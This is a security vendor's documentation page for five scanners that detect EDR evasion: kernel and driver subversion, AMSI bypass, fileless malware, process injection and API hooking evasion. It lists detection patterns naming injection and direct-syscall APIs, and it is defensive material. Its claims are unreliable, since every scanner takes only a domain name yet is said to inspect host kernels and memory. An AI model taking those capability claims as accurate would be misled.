Skip to content
VigilGuard Logo VigilGuard
Contact Us
EASM Platform VendorGuard ITRM Platform

EDR Evasion

EDR Evasion

Section titled “EDR Evasion”

5 automated security scanners

Driver-level Subversion

Section titled “Driver-level Subversion”

Purpose: The Driver-level Subversion Scanner is designed to detect potential EDR (Endpoint Detection and Response) evasion techniques by identifying kernel callbacks, filter drivers, and direct syscalls that may be used by malicious actors to conceal their activities from security monitoring systems.

What It Detects:

  • Kernel Callbacks: Identifies suspicious modifications or hooks in the system’s kernel callback functions, which can indicate evasion techniques.
  • Filter Drivers: Detects unauthorized filter drivers that could intercept and modify I/O operations without proper authorization, potentially used for data interception.
  • Direct Syscalls: Looks for direct system call usage that bypasses normal API layers, a common method to evade detection by security software.
  • Threat Indicators from Threat Intelligence Feeds: Scans for known vulnerabilities and malicious activities associated with the target domain using threat intelligence sources like Shodan, VirusTotal, CISA KEV, and others, helping in identifying potential threats.
  • Exposure Indicators: Identifies signs of data exposure or unauthorized access that could be related to EDR evasion attempts, aiding in security monitoring and response.

Inputs Required:

  • domain (string): The primary domain to analyze (e.g., acme.com). This input is crucial for fetching relevant threat intelligence data from Shodan and VirusTotal.

Business Impact: Detecting unauthorized modifications to kernel callbacks, filter drivers, and direct syscalls can significantly enhance the security posture of an organization by preventing potential data breaches and evasion of endpoint detection systems, thereby protecting sensitive information and maintaining regulatory compliance.

Risk Levels:

  • Critical: The scanner identifies unauthorized alterations in critical system components such as kernel callbacks and filter drivers, which could lead to a complete compromise of system integrity.
  • High: Direct syscall usage that bypasses standard API layers poses a high risk of evading security software detection, potentially leading to significant data exposure or unauthorized access.
  • Medium: Vulnerabilities identified through threat intelligence feeds like CVE entries can indicate potential risks if not addressed, affecting the overall security posture negatively.
  • Low: Exposure indicators might suggest minor issues such as accidental data leakage but do not pose a critical risk unless compounded with other vulnerabilities.
  • Info: Informational findings from threat intelligence sources provide basic insights into domain exposure and potential threats that are generally benign without further exploitation.

Example Findings:

  1. A filter driver detected on the system, which could potentially intercept sensitive data flows without proper authorization.
  2. Evidence of direct syscall usage in a critical application, indicating an attempt to evade standard security monitoring tools.

AMSI Script Blocking Bypass

Section titled “AMSI Script Blocking Bypass”

Purpose: The AMSI Script Blocking Bypass Scanner is designed to evaluate the effectiveness of Anti-Malware Scan Interface (AMSI) script blocking mechanisms by identifying known bypass techniques and indicators associated with malicious activities. This tool helps in assessing potential security risks posed by scripts that attempt to evade AMSI protections, ensuring a robust defense against malware and other threats.

What It Detects:

  • AMSI Bypass Techniques: The scanner detects specific code patterns designed to disable or bypass AMSI, as well as identifies obfuscated scripts containing keywords related to AMSI.
  • Malware Indicators: It searches for known malware signatures in the provided domain and analyzes for indicators of ransomware, trojans, and phishing activities.
  • Command and Control (C2) Activity: The scanner identifies patterns indicative of C2 communication channels through suspicious network traffic or domains.
  • Phishing and Credential Harvesting: It examines for content related to phishing and detects attempts to harvest credentials, which are critical in preventing unauthorized access and data exfiltration.
  • Vulnerability Indicators: The tool scans for known vulnerabilities using CVE identifiers and assesses exposed services for potential security weaknesses.

Inputs Required:

  • domain (string): Primary domain to analyze (e.g., acme.com). This input is essential for the scanner to target specific domains for analysis, ensuring focused assessments of relevant systems and data.

Business Impact: The effectiveness of AMSI in preventing malicious scripts from executing can significantly impact an organization’s security posture. By identifying bypass techniques early, this scanner helps organizations mitigate risks associated with malware infections and unauthorized access attempts, safeguarding critical assets and maintaining the integrity of their digital environments.

Risk Levels:

  • Critical: The risk is considered critical when the scanner detects active bypass techniques that have successfully evaded AMSI mechanisms, posing a direct threat to system security and stability.
  • High: High risks are associated with malware indicators such as ransomware or trojans present in the analyzed domain, indicating potential severe damage and data loss scenarios.
  • Medium: Medium risk findings involve phishing content or credential harvesting activities that could lead to unauthorized access but do not pose an immediate critical threat.
  • Low: Low risk findings pertain to vulnerabilities identified through CVE scanning, which may indicate areas for improvement in system configuration and software patching.
  • Info: Informational findings are those that provide insights into potential risks without being directly indicative of active threats or significant vulnerabilities.

Example Findings:

  • Critical: “Detected obfuscated script attempting to disable AMSI.” This finding highlights a sophisticated attempt by malware to evade detection, posing a high risk for unmonitored execution on systems.
  • High: “Found known malware signature in VirusTotal data.” This example indicates the presence of specific malware signatures that are indicative of active infections or potential future threats.

Fileless Malware Detection

Section titled “Fileless Malware Detection”

Purpose: The Fileless Malware Detection Scanner is designed to detect and identify memory-only execution and living-off-the-land techniques used by malware, which aim to evade traditional file-based detection methods. This scanner focuses on detecting processes that execute in memory without writing files to disk, using indicators such as reflective DLL injection, suspicious command-line arguments, and anomalous process behavior.

What It Detects:

  • Memory-Only Execution Indicators: The scanner identifies processes that use reflective DLL injection, which is a technique where malware injects itself into the memory space of another running process to execute its code. It also looks for the use of PowerShell or other scripting languages executing commands directly from memory, which can be indicative of malicious activity.
  • Living-off-the-Land Techniques: The scanner detects the abuse of legitimate system tools like certutil and powershell for malicious purposes. It identifies the misuse of Windows Management Instrumentation (WMI) and other built-in utilities to carry out unauthorized activities.
  • Threat Intelligence Indicators: Utilizing APIs such as Shodan, VirusTotal, CISA KEV, AbuseIPDB, and querying databases like NVD/CVE, the scanner collects intelligence on exposed services, domain/IP reputation, known exploited vulnerabilities, and more to detect potential threats.

Inputs Required:

  • domain (string): The primary domain to analyze, which helps in gathering threat intelligence related to the specified domain.

Business Impact: This scanner is crucial for organizations aiming to enhance their security posture by detecting advanced persistent threats that operate without leaving traces on disk. It aids in identifying potential breaches and malicious activities early, thereby minimizing damage and enhancing overall cybersecurity resilience.

Risk Levels:

  • Critical: Findings include indicators of critical vulnerabilities such as CVE entries directly referencing malware or ransomware strains.
  • High: The scanner identifies the use of well-known legitimate tools for malicious intent, indicating a high risk of exploitation and potential unauthorized access to systems.
  • Medium: Detects suspicious command-line arguments associated with known living-off-the-land tactics, which could lead to stealthy malware activities without triggering immediate critical alerts.
  • Low: Informational findings may include exposure indicators like leaked data or unauthorized access attempts, though they pose less severe risks compared to higher levels.
  • Info: Provides basic domain reputation checks and vulnerability scans that are primarily informative but help in understanding the baseline network posture.

Risk levels are inferred based on the severity of detected threats and potential impact on system security.

Example Findings:

  • A process is identified as using reflective DLL injection, which is a strong indicator of memory-only malware execution.
  • The scanner detects the use of powershell with suspicious command lines that suggest malicious activity, such as credential harvesting or exploitation of WMI services for unauthorized purposes.

Process Injection Techniques

Section titled “Process Injection Techniques”

Purpose: The Process Injection Techniques Scanner is designed to identify and detect process hollowing, DLL injection, and atom bombing techniques used by malicious actors. These techniques are employed to evade detection and execute unauthorized code within legitimate processes. By analyzing patterns of API usage and memory modifications, the scanner aims to provide insights into potential security threats and aid in incident response efforts.

What It Detects:

  • Process Hollowing Indicators: The scanner looks for indicators such as the creation of a suspended process and attempts to modify the memory space of a running process using APIs like CreateProcess, NtUnmapViewOfSection, and WriteProcessMemory.
  • DLL Injection Indicators: It identifies patterns related to loading external DLLs into processes, including the use of functions such as LoadLibrary, GetProcAddress, and VirtualAllocEx, as well as suspicious API calls like CreateRemoteThread or QueueUserAPC.
  • Atom Bombing Indicators: The scanner searches for patterns indicating the creation and usage of global atoms stored in the Global Atom Table, focusing on APIs such as GlobalAddAtom, GlobalGetAtomName, and SetWindowsHookEx.

Inputs Required:

  • domain (string): Primary domain to analyze (e.g., acme.com). This input is essential for directing the scanner’s analysis towards specific targets, enabling it to gather relevant data from external sources like Shodan and VirusTotal.

Business Impact: The detection of process injection techniques by this scanner is crucial as it helps in identifying potential malicious activities within organizations’ networks. By pinpointing unauthorized code execution paths, the scanner contributes significantly to maintaining a secure environment against advanced persistent threats (APTs).

Risk Levels:

  • Critical: The critical risk level pertains to situations where there are clear indications of process injection techniques being actively employed, potentially leading to severe system compromise and data exposure.
  • High: High-risk findings involve significant indicators of malicious activity that could lead to substantial damage or disruption if exploited further.
  • Medium: Medium-risk findings suggest potential vulnerabilities that might be exploitable but do not pose an immediate critical threat.
  • Low: Low-risk findings are generally informational and indicate minimal risk, often associated with benign activities or misconfigurations.
  • Info: Informational findings provide context about the environment without significant security implications.

If specific risk levels are not detailed in the README, they have been inferred based on the purpose of the scanner and its potential impact.

Example Findings: The scanner might flag instances where a process is created but never fully executed, or where external DLLs are loaded into multiple processes without clear business justification. These findings highlight areas that require further investigation to assess their true security posture.

Hooking Detection Evasion

Section titled “Hooking Detection Evasion”

Purpose: The Hooking Detection Evasion Scanner is designed to identify and detect various techniques employed by malware to bypass hooks, perform direct system calls, and utilize alternative API paths in an attempt to evade endpoint detection and response (EDR) systems. This scanner plays a crucial role in enhancing the security posture of organizations by providing insights into potential malicious activities that could go undetected by traditional EDR solutions.

What It Detects:

  • Hook Bypass Techniques: Identifies patterns indicative of hook bypass mechanisms such as UnhookWindowsHookEx, SetWindowsHookExW, and RemoveVectoredExceptionHandler.
  • Direct Syscalls: Detects code that performs direct system calls to avoid EDR hooks, including patterns like syscall; ret, NtCreateThreadEx, and NtAllocateVirtualMemory.
  • Alternative API Paths: Identifies the use of alternative or less common APIs such as RtlMoveMemory, LdrLoadDll, and ZwOpenProcess for performing sensitive operations.
  • Code Injection Indicators: Detects patterns suggesting code injection techniques like VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread.
  • Anti-Debugging Techniques: Identifies anti-debugging mechanisms such as IsDebuggerPresent, CheckRemoteDebuggerPresent, and NtQueryInformationProcess that may be used in conjunction with hook evasion.

Inputs Required:

  • domain (string): The primary domain to analyze, providing the scope of the scan (e.g., acme.com).

Business Impact: This scanner is crucial for organizations concerned with protecting their systems from sophisticated malware that employs evasive techniques to bypass security measures. By identifying and alerting on these patterns, it helps in preventing potential data breaches and maintaining a secure environment against malicious activities.

Risk Levels:

  • Critical: Patterns indicating highly advanced and persistent threats that are difficult to detect by traditional EDR systems.
  • High: Techniques that can bypass common security hooks and may lead to unauthorized access or data theft.
  • Medium: Less sophisticated methods that might be used in conjunction with other evasion techniques, requiring close monitoring.
  • Low: Informal indications of potential issues that could be part of a broader pattern but do not pose an immediate threat.
  • Info: General presence of API calls without clear evidence of malicious intent, useful for baseline analysis and continuous monitoring.

Example Findings:

  1. A sample containing UnhookWindowsHookEx suggests the use of a hook bypass technique that could evade standard security hooks.
  2. The detection of NtCreateThreadEx in code samples indicates potential attempts to perform direct system calls, which is indicative of an evasion strategy against EDR systems.